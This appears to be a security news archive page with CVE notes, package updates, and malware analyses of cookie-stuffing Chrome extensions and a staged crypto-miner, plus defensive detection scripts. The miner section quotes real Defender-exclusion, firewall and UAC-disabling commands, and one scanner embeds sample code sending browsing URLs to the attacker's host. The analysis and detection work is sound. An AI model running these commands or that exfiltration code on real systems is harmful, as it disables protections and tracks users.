IBM Engineering Test Management 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210671.
Monthly Archives: August 2022
CVE-2020-26938
In oauth2-server (aka node-oauth2-server) through 3.1.1, the value of the redirect_uri parameter received during the authorization and token request is checked against an incorrect URI pattern (“[a-zA-Z][a-zA-Z0-9+.-]+:”) before making a redirection. This allows a malicious client to pass an XSS payload through the redirect_uri parameter while making an authorization request. NOTE: this vulnerability is similar to CVE-2020-7741.
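As an added example (not node-oauth2-server's code), the following contrasts the scheme-only pattern quoted above with an allow-list check against the client's registered redirect URIs, which is what RFC 6749 recommends; the client record shape is assumed.

```javascript
// Added example, not node-oauth2-server's code: the scheme-only pattern that
// CVE-2020-26938 describes, beside an allow-list check (exact string match
// against the client's registered redirect URIs).
const WEAK_PATTERN = /^[a-zA-Z][a-zA-Z0-9+.-]+:/;

// Weak check: true for anything that merely starts with a URI scheme.
function weakRedirectUriCheck(redirectUri) {
  return WEAK_PATTERN.test(redirectUri);
}

// Stricter check: must parse as an absolute URL, use http(s), carry no
// fragment, and equal one of the client's registered redirect URIs.
// `client.redirectUris` is an assumed shape for the client record.
function strictRedirectUriCheck(redirectUri, client) {
  let parsed;
  try {
    parsed = new URL(redirectUri);
  } catch (err) {
    return false; // not an absolute URL at all
  }
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return false;
  if (parsed.hash) return false;
  return (client.redirectUris || []).includes(redirectUri);
}

// Constructed client record for illustration.
const exampleClient = { id: "client-1", redirectUris: ["https://app.example/cb"] };

// A redirect_uri with a non-http scheme passes the weak pattern but is
// rejected by the allow-list check; so is an unregistered https URL.
const candidates = ["https://app.example/cb", "javascript:void(0)", "https://other.example/cb"];
for (const uri of candidates) {
  console.log(uri, "weak:", weakRedirectUriCheck(uri), "strict:", strictRedirectUriCheck(uri, exampleClient));
}
```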
Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users
Authored by Oliver Devane and Vallabh Chole
A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000.
The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage.
Apart from offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.
The users of the extensions are unaware of this functionality and of the privacy risk of every visited site being sent to the servers of the extension authors.
The 5 extensions are:

Name | Extension ID | Users
--- | --- | ---
Netflix Party | mmnbenehknklpbendgmgngeaignppnbe | 800,000
Netflix Party 2 | flijfnhifgdcbhglkneplegafminjnhn | 300,000
FlipShope – Price Tracker Extension | adikhbfjdbjkhelbdnffogkobkekkkej | 80,000
Full Page Screenshot Capture – Screenshotting | pojgkmkfincpdkdgjepkmdekcahmckjp | 200,000
AutoBuy Flash Sales | gbnahglfafmhaehbdmjedfhdmimjcbed | 20,000
Technical Analysis
This section contains the technical analysis of the malicious Chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.
Manifest.json
The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites.
B0.js
The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.
Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.
Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:
Variable | Description
--- | ---
Ref | Base64-encoded referral URL
Country | The country of the device
City | The city of the device
Zip | The zip code of the device
Apisend | A random ID generated for the user
Name | Base64-encoded URL being visited
ext_name | The name of the Chrome extension
The random ID is created by selecting 8 random characters from a character set. The code is shown below:
The country, city, and zip are gathered using ip-api.com. The code is shown below:
Upon receiving the URL, langhort.com checks whether it matches a list of websites for which it has an affiliate ID, and if it does, it responds to the query. An example of this is shown below:
The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains.
Two of the functions are detailed below:
Result[‘c’] – passf_url
If the result is ‘c’, as in the example in this blog, the extension queries the returned URL. It then checks the response: if the status is 200 or 404, it checks whether the query responded with a URL, and if it did, it inserts the URL received from the server as an iframe on the website being visited.
Result[‘e’] – setCookie
If the result is ‘e’, the extension inserts the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website, as the extensions had the necessary ‘cookie’ permissions.
Behavioral flow
The images below show the step-by-step flow of events while navigating to the BestBuy website.
1. The user navigates to bestbuy.com and the extension posts this URL, Base64-encoded, to d.langhort.com/chrome/TrackData/.
2. Langhort.com responds with “c” and the URL. The “c” means the extension will invoke the function passf_url().
3. passf_url() performs a request against the URL.
4. The URL queried in step 3 is redirected, via a 301 response, to bestbuy.com with an affiliate ID associated with the extension owners.
5. The extension inserts the URL as an iframe in the bestbuy.com site being visited by the user.
6. The cookie is set for the affiliate ID associated with the extension owners. They will now receive a commission for any purchases made on bestbuy.com.
Here is a video of the events
Time delay to avoid automated analysis
We discovered an interesting trick in a few of the extensions that would prevent the malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity: the code checks whether the current date is more than 15 days after the time of installation, and only then proceeds.
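As an added example (not McAfee's code), the following static triage script flags the combination of traits described above: the chrome.tabs.onUpdated listener, Base64 encoding of the visited URL, a POST to an external host, cookie and iframe injection, and the post-install time delay. The manifest and background script are constructed to resemble the analysed extension; the heuristics and weights are assumptions.

```javascript
// Added example, not McAfee's code: static triage of an unpacked extension for the
// behaviour pattern described above. Heuristics and weights are mine; the manifest
// and script below are constructed to mimic the analysed extension.
const PERMISSION_FLAGS = ["tabs", "cookies", "<all_urls>", "webRequest"];

// Script-level indicators, each with an id and a weight (weights are my assumption).
const SCRIPT_PATTERNS = [
  { id: "tabs-onupdated", re: /chrome\.tabs\.onUpdated\.addListener/, weight: 1 },
  { id: "url-base64", re: /btoa\s*\(\s*[\w.]*url/i, weight: 2 },
  { id: "external-post", re: /method\s*:\s*["']POST["']/i, weight: 1 },
  { id: "cookie-set", re: /chrome\.cookies\.set/, weight: 2 },
  { id: "iframe-inject", re: /createElement\s*\(\s*["']iframe["']/i, weight: 2 },
  { id: "install-delay", re: /\d+\s*\*\s*24\s*\*\s*60\s*\*\s*60/, weight: 2 },
];

// Collect hostnames of absolute http(s) URLs embedded in a script.
function externalHosts(script) {
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(script)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Returns the findings for a manifest object plus a map of filename -> source text.
function triageExtension(manifest, scripts) {
  const findings = [];
  let score = 0;
  const perms = manifest.permissions || [];
  for (const p of PERMISSION_FLAGS) {
    if (perms.includes(p)) { findings.push("permission:" + p); score += 1; }
  }
  for (const [file, body] of Object.entries(scripts)) {
    for (const pat of SCRIPT_PATTERNS) {
      if (pat.re.test(body)) { findings.push(file + ":" + pat.id); score += pat.weight; }
    }
    for (const h of externalHosts(body)) findings.push(file + ":host:" + h);
  }
  return { findings, score };
}

// Constructed manifest and background script modelled on the blog's description of b0.js.
const sampleManifest = {
  manifest_version: 2,
  name: "Constructed Sample",
  permissions: ["tabs", "cookies", "storage", "<all_urls>"],
  background: { page: "bg.html" },
};
const sampleScript = `
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  var curl = tab.url;
  if (Date.now() - installTime < 15 * 24 * 60 * 60 * 1000) return; // 15-day delay
  fetch("https://d.langhort.com/chrome/TrackData/", { method: "POST",
    body: "name=" + btoa(curl) + "&apisend=" + apisend }).then(r => r.json()).then(handle);
});
function passf_url(u) { var f = document.createElement("iframe"); f.src = u; document.body.appendChild(f); }
function setCookie(url, n, v) { chrome.cookies.set({ url: url, name: n, value: v }); }
`;

const report = triageExtension(sampleManifest, { "b0.js": sampleScript });
console.log("score", report.score, "\n" + report.findings.join("\n"));
```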
Conclusion
This blog highlights the risk of installing extensions, even those with a large install base, as they can still contain malicious code.
McAfee advises its customers to be cautious when installing Chrome extensions and to pay attention to the permissions that they request.
The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity of an extension if it requests permissions that enable it to run on every website you visit, such as the ones detailed in this blog.
McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.
The malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.
Type | Value | Product | Detected
--- | --- | --- | ---
Chrome Extension | Netflix Party – mmnbenehknklpbendgmgngeaignppnbe | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | FlipShope – Price Tracker Extension – adikhbfjdbjkhelbdnffogkobkekkkej | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | Full Page Screenshot Capture – pojgkmkfincpdkdgjepkmdekcahmckjp | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn | Total Protection and LiveSafe | JTI/Suspect
Chrome Extension | AutoBuy Flash Sales – gbnahglfafmhaehbdmjedfhdmimjcbed | Total Protection and LiveSafe | JTI/Suspect
URL | www.netflixparty1.com | McAfee WebAdvisor | Blocked
URL | netflixpartyplus.com | McAfee WebAdvisor | Blocked
URL | flipshope.com | McAfee WebAdvisor | Blocked
URL | goscreenshotting.com | McAfee WebAdvisor | Blocked
URL | langhort.com | McAfee WebAdvisor | Blocked
URL | Unscart.in | McAfee WebAdvisor | Blocked
URL | autobuyapp.com | McAfee WebAdvisor | Blocked
The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.
rubygem-puma-4.3.6-5.fc35
FEDORA-2022-de968d1b6c
Packages in this update:
rubygem-puma-4.3.6-5.fc35
Update description:
Fix CVE-2022-23634 – information leak between requests.
Fix CVE-2022-24790 – http request smuggling vulnerabilities
Levels of Assurance for DoD Microelectronics
The NSA has published criteria for evaluating the levels of assurance required for DoD microelectronics.
The introductory report in a DoD microelectronics series outlines the process for determining levels of hardware assurance for systems and custom microelectronic components, which include application-specific integrated circuits (ASICs), field programmable gate arrays (FPGAs) and other devices containing reprogrammable digital logic.
The levels of hardware assurance are determined by the national impact caused by failure or subversion of the top-level system and the criticality of the component to that top-level system. The guidance helps programs acquire a better understanding of their system and components so that they can effectively mitigate against threats.
The report was published last month, but I only just noticed it.
Global Ransomware Damages to Exceed $30bn by 2023
Six hundred malicious email campaigns made their way across the internet in the first half of 2022
US Cyber Command and NSA Partner On Defence Efforts For Midterms Elections
The group’s main goal is to monitor foreign adversaries who may interfere with elections
Facebook agrees to settle class action lawsuit related to Cambridge Analytica data breach
Facebook parent Meta Platforms agreed Friday to settle a class action lawsuit seeking damages for allowing British political consulting firm Cambridge Analytica access to the private data of tens of millions of Facebook users. The settlement will spare CEO Mark Zuckerberg an embarrassing court appearance to defend his company.
Lawyers acting for the plaintiffs and for Facebook filed a joint request with the US District Court for the Northern District of California on Friday, asking the judge to put the class action on hold for sixty days while the two parties finalized a written settlement for an as-yet undisclosed amount. The high profile lawsuit has been running for over four years and claims that Facebook shared data of millions of US voters with Cambridge Analytica.
rubygem-puma-5.5.2-3.fc36
FEDORA-2022-52d0032596
Packages in this update:
rubygem-puma-5.5.2-3.fc36
Update description:
Fix CVE-2022-23634 – information leak between requests.
Fix CVE-2022-24790 – http request smuggling vulnerabilities.
Crypto miners’ latest techniques
Executive summary
Crypto miners are determined in their objective of mining on other people’s resources. Proof of this is one of the latest samples identified by AT&T Alien Labs, with at least 100 different loaders and at least 4 different stages to ensure their miner and backdoor run smoothly on the infected systems.
Key takeaways:
Attackers have been sending malicious attachments, with a special emphasis on Mexican institutions and citizens.
The techniques observed in these samples are known but still effective at keeping victims infected with their miners. Reviewing them reminds defenders of the current trends and how to improve their defenses.
The wide variety of loaders, in conjunction with the staged delivery of the miner and backdoor malware, shows how determined the attackers are to successfully deliver their payloads.
Analysis
Crypto miners have been present in the threat landscape for some years, since attackers identified the opportunity of leveraging victims’ CPUs to mine cryptocurrencies for them. Despite the current rough patch in the world of cryptocurrencies, these miners are still present and will be for the foreseeable future.
As seen in the current analysis, unlike IoT malware, which tries to reach as many infected devices as possible, these miners target victims through phishing samples. The techniques used by this malware are usually focused on reaching execution, avoiding detection to run under the radar, and gaining persistence to survive any reboot.
A new miner sample showed up on AT&T Alien Labs’ radar in April, with a wide range of different loaders aiming to execute it on infected systems up to this day. The loaders were initially delivered to the victims through an executable disguised as a spreadsheet. For example, one of the samples (fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba) carries a Microsoft Excel icon, but its file extension corresponds to an executable.
A wide range of decoy documents were found associated with this miner, many of them associated with Mexican civilians: exam results, dentist results, Mexican Governmental documents, Mexican Social Security, Tax returns, etc. Figure 1 corresponds to one of the spreadsheets observed. The campaign identified in this report materialized most of its attacks during the second half of June 2022. For example, the mentioned file above was compiled in late May 2022 and was first observed in the wild a month after, on June 20, 2022.
Figure 1. Decoy spreadsheet ‘ppercepciones anuales.xlsx’.
At the time of execution, the first activities performed are registry changes to cloak the malware samples. For example, by setting ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt’ to 1, the attackers hide file extensions and camouflage the executables as documents. Additionally, the registry value ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden’ is set to 0 to avoid displaying in Explorer the hidden files dropped during execution. Finally, ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin’ is set to 0 in order to execute any future samples with elevated privileges without explicit consent in the form of a pop-up or entering credentials.
The initial payload drops another executable file while opening the spreadsheet in Figure 1. This additional executable attempts to look legitimate. It is named ‘CmRccService.exe’ and uses the same name in its metadata for the product name, description and comments. It is probably an attempt to masquerade the process as the legitimate Microsoft process ‘CmRcService.exe’ (Configuration Manager Remote Control Service) (T1036.004). However, the legitimate files owned by Microsoft would have been signed with a Microsoft certificate, which is not the case for these files, which have not been signed at all.
Pivoting on this indicator returns over a hundred different samples created and delivered during the last three months, most of them in the last weeks. In addition to the product name ‘CmRccService.exe’, a similar decoy name, ‘RegistryManager.exe’, was observed in this campaign in at least 6 different samples. The RegistryManager samples even carry a copyright string attributed to Microsoft Corporation, once again lacking the corresponding file signature. These files are placed in the folder ‘C:\Windows\ImmersiveControlPanel’ in an attempt to make the processes look as legitimate as possible.
Persistence of the whole process is attempted during the execution of ‘CmRccService.exe’. A new service is registered in the system (T1543.003), to be run with highest privileges each time the user logs on.
Figure 2. Persistence mechanism.
This loader reaches out to several domains hosting the payloads for next stages, configuration files and one-line commands to be executed.
One of these domains is ‘bekopgznpqe[.]is’, initially created on February 22, 2022 with the name server of 1984 Hosting Company, which offers domain name registration free of charge. However, since this indicator makes the domain look suspicious to security companies, the domain was moved to Cloudflare on April 21 (a different nameserver with a better reputation due to its popularity and absence of free offerings). This technique has historically been used to improve the reputation of domains right before they are used in a campaign.
Additionally, the malware attempts to contact a supplemental domain, ‘dpwdpqshxux[.]ru’, which does not yet resolve but was created on February 21, 2022, a day before the ‘bekopgznpqe’ domain. There is no historical data of it ever resolving to any IP. For this reason, the domain is probably a backup plan, to be used if the first stops working.
The third and last domain identified during analysis did not follow the above pattern. The domain ‘2vkbjbpvqmoh[.]sh’ was created in January 2022 with the Njalla name server, known and marketed as a great offering for ‘Privacy as a Service’ for domains and VPNs. After some time operating, the domain was marked for deletion in May 2022.
Before executing the third stage payload, CmRccService performs several modifications to the firewall to allow inbound and outbound connections for the files it will drop afterwards. The command executed for these changes is ‘"C:\Windows\System32\cmd.exe" /C powershell New-NetFirewallRule -DisplayName 'RegistryManager' -Direction Inbound -Program 'C:\Windows\ImmersiveControlPanel\RegistryManager.exe' -Action Allow’.
Furthermore, the malware adds exclusions to Microsoft Windows Defender for the folders from which the malware will be executing and the files it intends to execute (T1562). The command used for this purpose is ‘powershell.exe $path = 'C:\Windows\Branding\oidz.exe' ; Add-MpPreference -ExclusionPath $path -Force’. The excluded folders and files include:
C:\Users
C:\Windows
C:\Windows\Temp
C:\Windows\ImmersiveControlPanel
C:\Windows\ImmersiveControlPanel\CmRccService.exe
C:\Windows\Branding
C:\Windows\Branding\umxn.exe
C:\Windows\Branding\oidz.exe
C:\Windows\Help\Windows
C:\Windows\Help\Windows\MsMpEng.exe
C:\Windows\IME
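As an added example (not Alien Labs' code), the detection logic below checks endpoint telemetry for the registry changes, firewall rule, Defender exclusions and unsigned lookalike binaries described above. The event records are constructed from the commands and paths quoted in the report; their field names are an assumed, Sysmon-like shape.

```javascript
// Added example, not Alien Labs' code: detection logic for the evasion steps
// described above, run over constructed telemetry records. The record shape
// (process-create and registry-set events) and field names are my assumption,
// loosely modelled on Sysmon.
const LOOKALIKES = new Set(["cmrccservice.exe", "registrymanager.exe", "msmpeng.exe", "mcmpeng.exe"]);

function basename(path) {
  return path.split("\\").pop();
}

const RULES = [
  { id: "defender-exclusion", technique: "T1562.001",
    match: e => e.type === "process" && /Add-MpPreference\s+-ExclusionPath/i.test(e.commandLine) },
  { id: "firewall-allow-rule", technique: "T1562.004",
    match: e => e.type === "process" && /New-NetFirewallRule[\s\S]*-Action\s+Allow/i.test(e.commandLine) },
  { id: "uac-consent-disabled", technique: "T1562.001",
    match: e => e.type === "registry" && /\\Policies\\System\\ConsentPromptBehaviorAdmin$/i.test(e.target) && e.value === 0 },
  { id: "hide-file-extensions", technique: "T1036",
    match: e => e.type === "registry" && /\\Explorer\\Advanced\\HideFileExt$/i.test(e.target) && e.value === 1 },
  // Unsigned binary under C:\Windows carrying a name that imitates a Microsoft component.
  { id: "unsigned-lookalike", technique: "T1036.004",
    match: e => e.type === "process" && !e.signed && /^C:\\Windows\\/i.test(e.image)
      && LOOKALIKES.has(basename(e.image).toLowerCase()) },
];

// Evaluate every rule against every event; returns one alert per match.
function evaluate(events) {
  const alerts = [];
  events.forEach((e, i) => {
    for (const r of RULES) {
      if (r.match(e)) alerts.push({ event: i, rule: r.id, technique: r.technique });
    }
  });
  return alerts;
}

// Constructed events reproducing the commands and registry writes quoted in the report.
const sampleEvents = [
  { type: "process", signed: false, image: "C:\\Windows\\ImmersiveControlPanel\\CmRccService.exe",
    commandLine: "C:\\Windows\\ImmersiveControlPanel\\CmRccService.exe" },
  { type: "process", signed: true, image: "C:\\Windows\\System32\\cmd.exe",
    commandLine: "\"C:\\Windows\\System32\\cmd.exe\" /C powershell New-NetFirewallRule -DisplayName 'RegistryManager' " +
      "-Direction Inbound -Program 'C:\\Windows\\ImmersiveControlPanel\\RegistryManager.exe' -Action Allow" },
  { type: "process", signed: true, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe $path = 'C:\\Windows\\Branding\\oidz.exe' ; Add-MpPreference -ExclusionPath $path -Force" },
  { type: "registry", target: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", value: 0 },
  { type: "registry", target: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", value: 1 },
  { type: "process", signed: true, image: "C:\\Windows\\System32\\notepad.exe", commandLine: "notepad.exe" }, // benign
];

console.log(evaluate(sampleEvents));
```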
The third stage payload is formed by the ‘p.exe’ executable, which doesn’t hide its contents, since the file’s metadata claims the filename is ‘payload.exe’. During execution, p drops two additional files, ‘oidz.exe’ and ‘umxn.exe’, which correspond to the final payloads. Figure 3 recaps the execution flow up to this point.
Figure 3. Execution tree.
‘Oidz.exe’ runs an infinite loop, as seen in Figure 4, that reaches out to the Command & Control (C&C) looking for new commands to execute. After execution, it includes a sleep command to space out the requests for additional commands as well as their executions. In other words, this executable corresponds to the backdoor installed on the system.
The commands to be executed are uploaded by the attackers to the C&C servers, and oidz reaches out to specific files on the server and executes them, allowing the attackers to keep any payload updated or modify its capabilities (T1102.003). This file does not aim to be persistent on the system, since the grandparent process ‘Cmrcservice.exe’ already is. The C&C server list seen in Figure 5 has a first parameter corresponding to the command to execute, while the second parameter corresponds to the flag of the command to be executed. This list of domains corresponds to the one used previously by ‘CmRccService’.
Figure 4. Oidz infinite loop.
Figure 5. C&C list.
Finally, ‘umxn.exe’ corresponds to the crypto miner, which runs with the configuration pulled from one of the C&C servers and stored in ‘%windir%\Help\Windows\config.json’. All the other files were preparing the environment for the miner: avoiding issues with execution and network communications, and enabling modifications during execution through the backdoor.
Since it was first observed in April 2022, some of the executables have changed names or shown some variations, which have been excluded from the report to avoid confusion. The execution line described in this report and shown in Figure 3 is the most common one observed. One of the most remarkable variations includes the file ‘MsMpEng.exe’ or ‘McMpEng.exe’, an additional stage executed by ‘umxn.exe’. This sample claims in its PE metadata to be the ‘Antimalware Service Executable’ to disguise its true nature.
Figure 6. MsMpEng.exe metadata.
Conclusion
AT&T Alien Labs has provided an overview of an ongoing crypto mining campaign that caught our eye due to the large number of loaders that have shown up during the month of June, as well as how staged the execution is for a malware as simple as a miner. Alien Labs will continue to monitor this campaign and include all the current and future IOCs in the pulse in Appendix B.
Associated indicators (IOCs)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.
Type | Indicator | Description
--- | --- | ---
SHA256 | fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba | ppercepciones anuales.xlsx
SHA256 | 00ba928455d7d8a92e5aeed3146925086c2451501e63a0d8ee9b7cbaaf1007de | CmRccService.exe
SHA256 | 8f0dc8c5e23ee42209e222db5a8cf8ee6e5d10b5dde32db5937d4499deef0302 | RegistryManager.exe
SHA256 | f77522d8476969ae13f8823b62646a9f2cec187e2d0e55298389b8ced60dd0c8 | p.exe
SHA256 | ec4c48ac55139c6e4f94395aca253d54e9bbc864cc0741f8e051d31cd7545620 | umxn.exe
SHA256 | c0dc67bfcefa5a74905f0d3a684e7c3214c5b5ca118e942d2f0cc2f53c78e06c | oidz.exe
SHA256 | 18493e0492eb276af746e50dee626f4d6a9b0880f063ebb77d8f3b475669bf65 | Sample miner configuration
Domain | 2vkbjbpvqmoh[.]sh | Malware and config server
Domain | bekopgznpqe[.]is | Malware and config server
Domain | dpwdpqshxux[.]ru | Unresolved domain
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
TA0001: Initial Access
  T1566: Phishing
    T1566.001: Spearphishing Attachment
TA0002: Execution
  T1059: Command and Scripting Interpreter
    T1059.001: PowerShell
    T1059.003: Windows Command Shell
  T1204: User Execution
    T1204.002: Malicious File
  T1569: System Services
    T1569.002: Service Execution
TA0003: Persistence
  T1543: Create or Modify System Process
    T1543.003: Windows Service
TA0004: Privilege Escalation
  T1543: Create or Modify System Process
    T1543.003: Windows Service
TA0005: Defense Evasion
  T1027: Obfuscated Files or Information
    T1027.002: Software Packing
  T1036: Masquerading
    T1036.004: Masquerade Task or Service
  T1562: Impair Defenses
    T1562.001: Disable or Modify Tools
    T1562.004: Disable or Modify System Firewall
TA0011: Command and Control
  T1102: Web Service
    T1102.003: One-Way Communication
TA0040: Impact
  T1496: Resource Hijacking
TA0042: Resource Development
  T1583: Acquire Infrastructure
    T1583.006: Domains
[1]EXE icon by Icons8; Cog icon by Icons8; XLS icon by Icons8